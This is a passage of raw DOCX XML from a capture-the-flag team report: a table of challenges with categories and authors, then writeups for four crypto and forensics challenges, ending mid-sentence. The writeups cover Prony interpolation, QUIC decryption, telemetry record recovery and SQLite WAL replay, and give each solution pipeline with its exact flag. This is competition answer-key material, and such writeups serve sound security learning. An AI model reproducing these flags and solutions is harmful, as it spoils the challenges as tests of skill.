                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10</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49">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>The Ledger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Reverse Engineering / Crypto (lattice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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4C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">11</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4D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Turning Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">12</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51">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>mirage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Pwn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">13</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55">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Monodromy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Reverse Engineering / Crypto (discrete log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:rPr/>
            </w:pPr>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b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="6b6b6b"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">14</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59">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Parallax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Crypto (lattice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GHOST-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ICS / Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>NEVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hardware / Crypto (bit-oracle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Mirror Garden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Mobile Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>echochamber-user (TryHackMe, boot2root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web / Linux Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>echochamber-root (TryHackMe, boot2root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web / Linux Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>KeyStone - User (TryHackMe, boot2root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Web / TPM Attestation / Linux Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>KeyStone - Root (TryHackMe, boot2root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Linux Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Lossless, Not Harmless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Anirudh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>The Image That Forgot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Anirudh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>one-more</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Crypto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Palimpest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>rimefold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Pwn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>slab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Pwn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>the-press</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>The Loom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>The Recurrence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reverse Engineering / Crypto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4046"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>signed, but which original?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vikas1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore w:val="1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge writeups</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6b6b6b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy this page for each solved challenge.</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1</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Sparse-Change</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Crypto</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isfcr{pr0ny_kn3w_1t_1n_1795}</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sympy (Berlekamp-Massey, GF(p) factoring, Pohlig-Hellman), pycryptodome (AES-GCM)</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Given chall.py and output.json: a machine's "sweep log" is 48 numbers, log[0..47] = F(g^j) for j = 0..47 over a field GF(p), plus an AES-GCM-encrypted blob that only opens with the correct secret term list.</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log[j] = F(g^j) = sum_i c_i * (g^{e_i})^j. That is a sparse exponential sum, i.e. a linear recurrence of order 24 whose characteristic-polynomial roots are x_i = g^{e_i}. This is exactly Prony's method (1795) for sparse polynomial interpolation.</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Recovery pipeline (solve.py, using sympy + pycryptodome):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1. Berlekamp-Massey on the 48 samples -&gt; order-24 connection polynomial over GF(p).</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2. Factor that polynomial into 24 linear factors -&gt; the 24 roots x_i = g^{e_i}.</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3. p-1 is built from small prime factors, so Pohlig-Hellman (base g) recovers each    discrete-log exponent e_i from x_i.</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4. The first 24 log entries form a Vandermonde system in the unknown coefficients c_i;    solved it directly for the sparse term list.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5. AES key = SHA-256(";".join(f"{e}:{c}" for e,c sorted by exponent)), per the    challenge's own note; used it to AES-GCM-decrypt output.json's blob.</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isfcr{pr0ny_kn3w_1t_1n_1795}</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AES-GCM authentication tag verified on decryption, confirming the recovered term list was exactly right.</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2</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The Third Key Phase</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Forensics</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isfcr{7d6bae9970a1173284046064}</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Wireshark/tshark, custom QUIC/TLS-1.3 record decryptor, hashlib.scrypt</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capture.pcapng: a QUIC/UDP-443 capture of 5 connections, no visible TLS handshake packets in Wireshark. Had to recover the exact bytes of the file accepted by the intake service for request id 6e26102a48d71fe1d7f68231, then derive a key from [request_id, client_random, sha256(file)].</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Wireshark couldn't decode the capture because the handshake packets weren't present; the embedded TLS secrets were keyed by client_random. The 5 connections use different cipher/QUIC-version combinations (AES-128-GCM and AES-256-GCM on QUICv1, AES-GCM and ChaCha20 on QUICv2), and some packets needed a TLS 1.3 key-update ("key phase" — the challenge's title) to decrypt. Wrote a custom decryptor instead of relying on tshark's built-in QUIC support; it decrypted 261/265 packets (the remaining 4 were tiny, treated as noise).</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The request id appeared on two connections: bfa624... (client cancelled it, stream 8 reset) and 87566bdc... (the one that actually delivered the file, resending the failed parts: stream 4 -&gt; stream 20, stream 8 -&gt; stream 16; the server rejected a later stream 24 with status 26). Rebuilt the file by interleaving streams 0, 20, 16 and 12 (data striped in 119-byte units), which produced a clean raw-DEFLATE stream decompressing to 16,456 bytes (a CSV starting "# transfer 6e26102a..."). Computed SHA-256 of the decompressed bytes (not the compressed bytes, which don't match), then ran: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evidence = ["6e26102a48d71fe1d7f68231",</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"87566bdc267eee5e8a8a7d0251033ec0ce2aef613ef35623cf1e6dc5fc1310d3",</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"43669914701c2add27583d67043e96c02f44d622a78116f10fea5fac66e233dd"]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through hashlib.scrypt(b"isfcr-forensics\x00" + E, salt=...) exactly as specified to derive the AES key, then AES-GCM-decrypted the flag blob.</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isfcr{7d6bae9970a1173284046064}</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Key derivation matched and the flag decrypted cleanly from the derived AES-GCM key.</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3</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The Deletion Echo</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Forensics</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isfcr{763c8479fac095a9e471ad3d}</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numpy (linear least squares / integer programming), unlock.py (challenge harness)</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safe_alone.zip -&gt; data.json: six gate-telemetry snapshots of a model's Hessian-like statistics (each from 240 queries), where some records had been deleted between snapshots. Had to submit the exact deleted-record id:value list to unlock.py.</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Fit each snapshot's 240 queries: the means give theta, the variances give the noise variance and H^-1, recovering H and b = H*theta almost exactly per snapshot. Two snapshots (d170 and e21c) were identical, so one was a stale redeploy and could be ignored. The remaining four formed a clear chain: 2ee9 -&gt; d170 -&gt; e385 -&gt; 9ccb, where the first and last steps are pure ingest batches (5798d74d, 578b7698) matching with no residual.</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The middle step added batch e0449f2a and also deleted records. Fit the leftover H change to non-negative combinations of candidate rank-one terms -&gt; exactly 26 candidates, each weight 1. The b change equals the batch's labelled sum minus the deleted records' labelled sum -&gt; 12 equations in 36 unknown labels in {0,1,2,3}; an integer program solved it with max error ~0.005. Submitted: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python3 unlock.py '["record-0730706150:0","record-28c0bbf813:2","record-2e6662ecc6:3",</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"record-3de105d25d:3","record-3ee76f33c8:2","record-46126dd779:0","record-473e486afd:0",</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"record-49aa7c51a4:2","record-507645d5d9:2","record-58fad90382:2","record-5bc7d8554c:1",</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"record-66f65f5026:0","record-71fb3e266c:2","record-7796490f27:1","record-77a4509144:1",</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"record-8f4b4073f9:1","record-90769aad7a:1","record-978b124800:1","record-9cddf7a4fb:0",</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"record-9cfdc74744:3","record-b9e67b6811:2","record-cf44aec78a:2","record-cf4fee237a:0",</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"record-d32fd7d5d5:1","record-ebfb2ad09e:0","record-ee9e7ec4d8:1"]'</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isfcr{763c8479fac095a9e471ad3d}</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unlock.py accepted the 26-record answer directly and returned the flag.</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4</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The Last Committed Message</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Forensics</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isfcr{a03a410f1b87dbc115dd1ef6}</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sqlite3 CLI, manual SQLite WAL frame replay, cryptography (AES-GCM)</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case.db / case.db-wal: had to recover a note and its attachment record exactly as they stood when export export-07abca69cd99 was acknowledged, using an export log that ties export ids to operation ids and statuses.</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export-07abca69cd99 appears twice in the export log: once against op-c46dc0e04bdd (status: timeout -- a decoy, since a timed-out operation never describes real post-commit state) and once against op-09e0d79b4b14 (status: acknowledged -- the real one). The live database and the newest WAL generation only retain the latest few operations; an older WAL generation with stale salt 1049188690 sits after the valid frames and had to be replayed separately.</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Replayed that older WAL generation frame-by-frame up to frame 454 (database size 208 pages), the exact frame that committed the operation record for op-09e0d79b4b14. Because the older generation doesn't sit on a clean base, tried three different ways of layering its pages over the live database file and the oldest generation; all three agreed on the same note row and attachment hash:</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Note id:      note-7211098c21a6, revision "5"</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Destination:  sftp://drop-edef61bb364d.example.invalid/inbox/.../5ec4921ffe4835a0.bin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?ticket=a638d0e59bf0b87a8d34c22020f0555d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Attachment:   blob-72346f69c681,</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sha256 b89d5c5695803071522614060828e31e9bb4bc25813fdbc5d516db06ac4c2d58</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Used sqlite3 directly on a scratch copy of the handout (never touching the original extracted files) to cross-check page contents, then fed this evidence into the challenge's 